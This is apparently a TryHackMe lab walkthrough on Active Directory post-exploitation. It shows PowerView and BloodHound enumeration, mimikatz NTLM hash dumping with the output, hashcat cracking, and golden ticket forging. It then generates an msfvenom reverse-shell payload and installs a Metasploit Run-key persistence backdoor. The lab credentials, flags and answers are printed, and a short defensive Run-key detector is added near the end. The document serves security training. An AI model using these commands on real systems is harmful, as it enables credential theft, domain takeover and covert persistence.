
TryHackMe - Post-Exploitation Basics Walkthrough

This room covers the basics of post-exploitation and maintaining access with mimikatz, BloodHound, PowerView and msfvenom. It was created by Cryillic.

This room covers:

  • Task 1 : Introduction
  • Task 2 : Enumeration w/ Powerview
  • Task 3 : Enumeration w/ Bloodhound
  • Task 4 : Dumping hashes w/ mimikatz
  • Task 5 : Golden Ticket Attacks w/ mimikatz
  • Task 6 : Enumeration w/ Server Manager
  • Task 7 : Maintaining Access

Task 1: Introduction

This room on TryHackMe covers the basics of post-exploitation after gaining access to an Active Directory (AD) machine.

Enumeration will use tools such as PowerView, mimikatz and BloodHound. We will dump password hashes and create golden tickets using mimikatz, gather information from the Windows server, then use Metasploit to gain persistence on the machine.


Task 2 : Enumeration w/ Powerview

To start the room, we can RDP or SSH into the machine with the credentials:

  • Username: Administrator
  • Password: P@$$W0rd
  • Domain Name: CONTROLLER

Powerview

This is a powerful PowerShell script that can be used for enumerating a domain after you have gained a shell on the system.
We can download PowerView from here as PowerView.ps1.

  1. Start PowerShell using powershell -ep bypass. The -ep (ExecutionPolicy) bypass switch bypasses PowerShell's execution policy, allowing you to run scripts easily.
  2. Start PowerView by dot-sourcing the script: . .\Downloads\PowerView.ps1
  3. Enumerate the domain users - Get-NetUser | select cn
  4. Enumerate the domain groups - Get-NetGroup -GroupName *admin*

Questions

  1. What is the shared folder that is not set by default? Share


  2. What operating system is running inside of the network besides Windows Server 2019? Windows 10 Enterprise Evaluation


  3. I’ve hidden a flag inside of the users, find it. POST{P0W3RV13W_FTW}


Task 3: Enumeration w/ Bloodhound

Bloodhound is a graphical interface that allows you to visually map out the network.

This tool, together with [SharpHound](https://github.com/BloodHoundAD/SharpHound), takes the users, groups, trusts, etc. of the network and collects them into .json files to be used inside BloodHound.

BloodHound Installation

  1. sudo apt install bloodhound
  2. sudo neo4j console

Getting loot w/ SharpHound

  1. powershell -ep bypass
  2. . .\Downloads\SharpHound.ps1
  3. Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip   
----------------------------------------------- 
Initializing SharpHound at 5:37 AM on 8/11/2022 
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain CONTROLLER.LOCAL using path CN=Schema,CN=Configuration,DC=CONTROLLER,DC=LOCAL    
[+] Cache File not Found: 0 Objects in cache 

[+] Pre-populating Domain Controller SIDS 
Status: 0 objects finished (+0) -- Using 72 MB RAM 
Status: 66 objects finished (+66 33)/s -- Using 80 MB RAM 
Enumeration finished in 00:00:02.2222608 
Compressing data to C:\Users\Administrator\20220811053745_loot.zip
You can upload this file directly to the UI 

SharpHound Enumeration Completed at 5:37 AM on 8/11/2022! Happy Graphing!

Transfer the loot zip file to our attacking machine using scp (if connected over SSH).

┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> scp Administrator@10.10.11.93:20220811025924_loot.zip 20220811025924_loot.zip
Administrator@10.10.11.93's password: 
20220811025924_loot. 100% 9539     9.3KB/s   00:01

I experienced issues while running the zip file, as BloodHound was reporting bad JSON. I therefore uploaded the latest version of SharpHound as below and used it to get our loot.

┌─[kali@kali] - [~/tools/BloodHound/Collectors]
└─[$] <> scp SharpHound.exe Administrator@10.10.72.5:SharpHound.exe 
Administrator@10.10.72.5's password: 
SharpHound.exe
PS C:\Users\Administrator> . .\SharpHound.exe  --collectionmethods All --domain CONTROLLER.local --zipfilename loot.zip
2022-08-11T06:37:58.3852711-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-08-11T06:37:58.5571459-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 
2022-08-11T06:37:58.5727475-07:00|INFORMATION|Initializing SharpHound at 6:37 AM on 8/11/2022
2022-08-11T06:37:58.9165260-07:00|INFORMATION|Loaded cache with stats: 62 ID to type mappings. 
 63 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2022-08-11T06:37:58.9321453-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 
2022-08-11T06:37:59.1040229-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-08-11T06:37:59.1508947-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-08-11T06:38:29.1821539-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2022-08-11T06:38:42.5271796-07:00|INFORMATION|Consumers finished, closing output channel
2022-08-11T06:38:42.5583848-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-08-11T06:38:42.6521887-07:00|INFORMATION|Status: 104 objects finished (+104 2.418605)/s -- Using 42 MB RAM
2022-08-11T06:38:42.6521887-07:00|INFORMATION|Enumeration finished in 00:00:43.5858822
2022-08-11T06:38:42.7303070-07:00|INFORMATION|Saving cache with stats: 62 ID to type mappings.
 64 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2022-08-11T06:38:42.7459344-07:00|INFORMATION|SharpHound Enumeration Completed at 6:38 AM on 8/11/2022! Happy Graphing!

Now we can analyze the data successfully with BloodHound.

Mapping the network w/ BloodHound

First off we need to start up neo4j before starting Bloodhound in another terminal.

┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] sudo neo4j console

Log in with the default neo4j credentials (neo4j:neo4j) on the site that opens at http://localhost:7474/browser/, then change the credentials to anything you wish when prompted.

Next, launch BloodHound.

Use the Import Graph option, or directly drag and drop the zip file onto BloodHound, for further analysis.

We can then choose any query we want.


Questions

  1. What service is also a domain admin? SQLSERVICE


  2. What two users are Kerberoastable? SQLSERVICE,KRBTGT



Task 4 : Dumping hashes w/ mimikatz

Mimikatz is a popular and powerful post-exploitation tool used for dumping user credentials inside of an Active Directory network.

We will dump the NTLM hashes with mimikatz and then crack those hashes using hashcat.

Dump Hashes

Launch mimikatz from the \Downloads directory and run privilege::debug to ensure that you’re running mimikatz as an administrator; if not, mimikatz does not run properly.


Dump the hashes using lsadump::lsa /patch:

mimikatz # lsadump::lsa /patch 
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 

RID  : 000001f4 (500)
User : Administrator
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000001f5 (501)
User : Guest
LM   :
NTLM :

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf

RID  : 0000044f (1103)
User : Machine1
LM   :
NTLM : 64f12cddaa88057e06a81b54e73b949b

RID  : 00000451 (1105)
User : Admin2 
LM   :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe

RID  : 00000452 (1106)
User : Machine2
LM   :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0

RID  : 00000453 (1107)
User : SQLService
LM   :
NTLM : f4ab68f27303bcb4024650d8fc5f973a

RID  : 00000454 (1108)
User : POST
LM   :
NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2

RID  : 00000457 (1111)
User : sshd
LM   :
NTLM : 2777b7fec870e04dda00cd7260f7bee6

RID  : 000003e8 (1000)
User : DOMAIN-CONTROLL$
LM   :
NTLM : 7bb0c59ff58520b2e3ef7d95d294b1a4

RID  : 00000455 (1109)
User : DESKTOP-2$
LM   :
NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c

RID  : 00000456 (1110)
User : DESKTOP-1$
LM   :
NTLM : 7d33346eeb11a4f12a6c201faaa0d89a

Cracking the hashes w/ hashcat

For this, we can use the rockyou.txt wordlist with the command below, where -m 1000 selects hashcat's NTLM mode:

hashcat -m 1000 hash.txt /path/to/rockyou.txt

Questions:

  1. What is the Machine1 password? Password1

    ┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
    └─[$] <> hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
    hashcat (v6.2.5) starting

    OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
    ============================================================================================================================================
    * Device #1: pthread-Intel(R) Core(TM) i7-4600U CPU @ 2.10GHz, 2917/5899 MB (1024 MB allocatable), 4MCU

    Minimum password length supported by kernel: 0
    Maximum password length supported by kernel: 256

    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
    Rules: 1

    Optimizers applied:
    * Zero-Byte
    * Early-Skip
    * Not-Salted
    * Not-Iterated
    * Single-Hash
    * Single-Salt
    * Raw-Hash

    ATTENTION! Pure (unoptimized) backend kernels selected.
    Pure kernels can crack longer passwords, but drastically reduce performance.
    If you want to switch to optimized kernels, append -O to your commandline.
    See the above message to find out about the exact limits.

    Watchdog: Temperature abort trigger set to 90c

    Host memory required for this attack: 1 MB

    Dictionary cache hit:
    * Filename..: /usr/share/wordlists/rockyou.txt
    * Passwords.: 14344385
    * Bytes.....: 139921507
    * Keyspace..: 14344385

    64f12cddaa88057e06a81b54e73b949b:Password1

    Session..........: hashcat
    Status...........: Cracked
    Hash.Mode........: 1000 (NTLM)
    Hash.Target......: 64f12cddaa88057e06a81b54e73b949b
    Time.Started.....: Thu Aug 11 11:42:26 2022 (0 secs)
    Time.Estimated...: Thu Aug 11 11:42:26 2022 (0 secs)
    Kernel.Feature...: Pure Kernel
    Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:  1508.0 kH/s (0.25ms) @ Accel:512 Loops:1 Thr:1 Vec:8
    Recovered........: 1/1 (100.00%) Digests
    Progress.........: 4096/14344385 (0.03%)
    Rejected.........: 0/4096 (0.00%)
    Restore.Point....: 2048/14344385 (0.01%)
    Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
    Candidate.Engine.: Device Generator
    Candidates.#1....: slimshady -> oooooo
    Hardware.Mon.#1..: Util: 29%

    Started: Thu Aug 11 11:42:25 2022
    Stopped: Thu Aug 11 11:42:31 2022

  2. What is the Machine2 Hash? c39f2beb3d2ec06a62cb887fb391dee0

    RID  : 00000452 (1106)
    User : Machine2
    LM   :
    NTLM : c39f2beb3d2ec06a62cb887fb391dee0


Task 5 : Golden Ticket Attacks w/ mimikatz

A Golden Ticket attack is a type of attack in which an adversary gains control over an Active Directory Key Distribution Service Account (KRBTGT), and uses that account to forge valid Kerberos Ticket Granting Tickets (TGTs).

Given this definition, the previous hash dump already contains what we need: the krbtgt hash.

RID  : 000001f6 (502)
User : krbtgt
LM   :
NTLM : 5508500012cc005cf7082a9a89ebdfdf

Having the SID and NTLM hash of the krbtgt account will therefore enable us to create a custom TGT, the Golden Ticket, which lets us act as any account on any machine in the AD network.

With the mimikatz process still running we can proceed directly, but in case you closed it, run the following first:

mimikatz # privilege::debug 
Privilege '20' OK

Then proceed to dump the hash of krbtgt:

mimikatz # lsadump::lsa /inject /name:krbtgt 
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf 
    LM   :
  Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
    ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
    lm  - 0: 372f405db05d3cafd27f8e6a4a097b2c

 * WDigest
    01  49a8de3b6c7ae1ddf36aa868e68cd9ea
    02  7902703149b131c57e5253fd9ea710d0
    03  71288a6388fb28088a434d3705cc6f2a
    04  49a8de3b6c7ae1ddf36aa868e68cd9ea
    05  7902703149b131c57e5253fd9ea710d0
    06  df5ad3cc1ff643663d85dabc81432a81 
    07  49a8de3b6c7ae1ddf36aa868e68cd9ea
    08  a489809bd0f8e525f450fac01ea2054b
    09  19e54fd00868c3b0b35b5e0926934c99
    10  4462ea84c5537142029ea1b354cd25fa
    11  6773fcbf03fd29e51720f2c5087cb81c
    12  19e54fd00868c3b0b35b5e0926934c99
    13  52902abbeec1f1d3b46a7bd5adab3b57
    14  6773fcbf03fd29e51720f2c5087cb81c
    15  8f2593c344922717d05d537487a1336d
    16  49c009813995b032cc1f1a181eaadee4
    17  8552f561e937ad7c13a0dca4e9b0b25a
    18  cc18f1d9a1f4d28b58a063f69fa54f27 
    19  12ae8a0629634a31aa63d6f422a14953
    20  b6392b0471c53dd2379dcc570816ba10
    21  7ab113cb39aa4be369710f6926b68094
    22  7ab113cb39aa4be369710f6926b68094
    23  e38f8bc728b21b85602231dba189c5be
    24  4700657dde6382cd7b990fb042b00f9e
    25  8f46d9db219cbd64fb61ba4fdb1c9ba7
    26  36b6a21f031bf361ce38d4d8ad39ee0f
    27  e69385ee50f9d3e105f50c61c53e718e
    28  ca006400aefe845da46b137b5b50f371
    29  15a607251e3a2973a843e09c008c32e3

 * Kerberos
    Default Salt : CONTROLLER.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 64ef5d43922f3b5d

 * Kerberos-Newer-Keys
    Default Salt : CONTROLLER.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 8e544cabf340db750cef9f5db7e1a2f97e465dffbd5a2dc64246bda3c75fe53d
      aes128_hmac       (4096) : 7eb35bddd529c0614e5ad9db4c798066
      des_cbc_md5       (4096) : 64ef5d43922f3b5d

 * NTLM-Strong-NTOWF
    Random Value : 666caaaaf30081f30211bd7fa445fec4

We can create the Golden Ticket using any username, but the domain name, the domain SID and the krbtgt password hash must be the real ones.

mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
User      : Administrator                                                       
Domain    : controller.local (CONTROLLER)                                       
SID       : S-1-5-21-849420856-2351964222-986696166                             
User Id   : 500                                                                 
Groups Id : *513 512 520 518 519                                                
ServiceKey: 5508500012cc005cf7082a9a89ebdfdf - rc4_hmac_nt                      
Lifetime  : 8/11/2022 11:19:47 AM ; 8/8/2032 11:19:47 AM ; 8/8/2032 11:19:47 AM 
-> Ticket : ticket.kirbi                                                        
                                                                                
 * PAC generated                                                                
 * PAC signed                                                                   
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

Use misc::cmd to open a new command prompt with elevated privileges across all machines.

mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF6427A43B8

Task 6 : Enumeration w/ Server Manager

Servers are hardly ever logged on to except for maintenance, which makes enumeration easy using only built-in Windows features such as Server Manager.

If you have domain admin you have a lot of access in Server Manager: you can change trusts, add or remove users, look at groups, etc. This makes it a great entry point to find other users with sensitive information on their machines, or users on the domain network with access to other networks to pivot to.

For this we need to RDP into the server as below:

┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> rdesktop -u Administrator -d CONTROLLER 10.10.33.104

Enumerate w/ Server Manager

When we open Server Manager we get a number of options which we can use to enumerate the server, from adding roles to editing them, etc. However, these actions can be flagged by system admins.

Navigate to the Tools tab and select Active Directory Users and Computers.

This brings up a list of all users on the domain as well as some other useful tabs such as groups and computers.

Questions

  1. What tool allows you to view the event logs? Event Viewer

  2. What is the SQL Service password? MYpassword123#


Task 7 : Maintaining Access

For this lab, we will use Metasploit for persistence, creating a meterpreter shell on the victim's machine which we can reconnect to even after the machine is shut down and started again.

Other means include advanced backdoors, rootkits, etc.

Generating a payload w/ msfvenom

We can generate a Windows meterpreter reverse_tcp shell on our attackbox and then transfer it to the target machine.

┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT=4444 -f exe -o shell.exe 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> scp shell.exe  Administrator@10.10.242.212:shell.exe
┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> scp shell.exe  Administrator@10.10.136.0:shell.exe
Administrator@10.10.136.0's password: 
shell.exe

Once the file is transferred, SSH into the machine and confirm that it arrived.

┌─[kali@kali] - [~/Downloads/ctf/thm/post-exploitation]
└─[$] <> ssh Administrator@10.10.136.0             
Administrator@10.10.136.0's password: 
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>dir 
 Volume in drive C has no label.                                 
 Volume Serial Number is F83F-6346                               
                                                                 
 Directory of C:\Users\Administrator                             
                                                                 
08/12/2022  01:33 PM    <DIR>          .                         
08/12/2022  01:33 PM    <DIR>          ..                        
05/13/2020  08:01 PM    <DIR>          3D Objects                
05/13/2020  08:01 PM    <DIR>          Contacts                  
05/13/2020  08:01 PM    <DIR>          Desktop                   
05/14/2020  08:27 PM    <DIR>          Documents                 
10/03/2020  08:33 AM    <DIR>          Downloads                 
05/13/2020  08:01 PM    <DIR>          Favorites                 
05/13/2020  08:01 PM    <DIR>          Links                     
05/13/2020  08:01 PM    <DIR>          Music                     
05/13/2020  08:01 PM    <DIR>          Pictures                  
05/13/2020  08:01 PM    <DIR>          Saved Games               
05/13/2020  08:01 PM    <DIR>          Searches                  
08/12/2022  01:33 PM            73,802 shell.exe                 
05/13/2020  08:01 PM    <DIR>          Videos                    
               1 File(s)         73,802 bytes                    
              14 Dir(s)  52,008,374,272 bytes free               
                                                                 
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>

In another terminal, launch Metasploit using the msfconsole command and use exploit/multi/handler to listen for the reverse shell.

Set the LHOST and LPORT.

Configure our payload to be a Windows meterpreter shell using: set payload windows/meterpreter/reverse_tcp

Then run the exploit first, followed by shell.exe on the target machine over the SSH session.

┌─[kali@kali] - [~] 
└─[$] <> msfconsole -q                                                                                
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST IP
LHOST => IP
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on IP:4444 
[*] Sending stage (175686 bytes) to 10.10.136.0
id
[*] Meterpreter session 11 opened (IP:4444 -> 10.10.136.0:49885) at 2022-08-12 16:49:06 -0400

meterpreter >

Our meterpreter listener will receive an incoming connection. Background the shell using bg in order to run the persistence module.

meterpreter > bg
[*] Backgrounding session 11...
msf6 exploit(multi/handler) > use exploit/windows/local/persistence
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/persistence) >

Run the Persistence Module

We will use exploit/windows/local/persistence, which by default calls back with the payload every 10 seconds.

Set the session to the one that we backgrounded, in this case session 11, after which we can run the exploit.

msf6 exploit(windows/local/persistence) > set session 11
session => 11
msf6 exploit(windows/local/persistence) > run

[*] Running persistent module against DOMAIN-CONTROLL via session ID: 11
[+] Persistent VBS script written on DOMAIN-CONTROLL to C:\Users\Administrator\AppData\Local\Temp\AFjTyniKyCbKq.vbs
[*] Installing as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\HbpPWIFt
[+] Installed autorun on DOMAIN-CONTROLL as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\HbpPWIFt
[*] Clean up Meterpreter RC file: /home/kali/.msf4/logs/persistence/DOMAIN-CONTROLL_20220812.5441/DOMAIN-CONTROLL_20220812.5441.rc

On running the persistence module, the old session dies and a new session is spawned.
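A defender's check for the autorun the persistence module just installed, added here as an example and not part of the original walkthrough or of Metasploit: it parses reg query output of the HKCU Run key and flags values that launch a script from a Temp directory under a machine-generated name. The registry output is a constructed sample; the value name HbpPWIFt and the file AFjTyniKyCbKq.vbs are the ones printed above, while the OneDrive entry and the exact wscript command line are assumptions.

```python
import re

# Constructed sample of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# output, not taken from the page. The value name HbpPWIFt and the script name
# AFjTyniKyCbKq.vbs are the ones Metasploit printed above; the OneDrive entry and
# the exact command line stored in the value are assumptions.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    HbpPWIFt    REG_SZ    wscript.exe //B //NoLogo C:\Users\Administrator\AppData\Local\Temp\AFjTyniKyCbKq.vbs
"""

SCRIPT_FILE = re.compile(r"\.(vbs|vbe|js|jse|wsf|hta|ps1|bat|cmd)(?=[\"\s]|$)", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*)$")


def parse_reg_query(text):
    """Yield (key, value name, type, data) for each value line of `reg query` output."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        match = VALUE_LINE.match(line)
        if match and key:
            yield key, match.group(1), match.group(2), match.group(3).strip()


def looks_random(name):
    """Crude test for generated names like HbpPWIFt: letters only, mixed case, few vowels."""
    if not name.isalpha() or len(name) < 6:
        return False
    mixed_case = name != name.lower() and name != name.upper()
    vowels = sum(ch in "aeiouAEIOU" for ch in name)
    return mixed_case and vowels / len(name) < 0.25


def find_suspicious_run_entries(text):
    """Return Run-key values that match the script-in-Temp autorun pattern seen above."""
    findings = []
    for key, name, _reg_type, data in parse_reg_query(text):
        reasons = []
        if SCRIPT_FILE.search(data):
            reasons.append("launches a script file")
        if TEMP_DIR.search(data):
            reasons.append("runs from a Temp directory")
        if looks_random(name):
            reasons.append("value name looks machine-generated")
        if reasons:
            findings.append({"key": key, "name": name, "data": data, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_run_entries(SAMPLE_REG_QUERY):
        print(f"{finding['key']}\\{finding['name']}: {', '.join(finding['reasons'])}")
        print("   ", finding["data"])
```

The same parser works on HKLM\...\Run output, where a persistence module run with SYSTEM rights would write instead.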

Awesome!!!

We are done with a section of the AD journey. I do hope you have gotten to learn something with me.

Happy Hacking!!!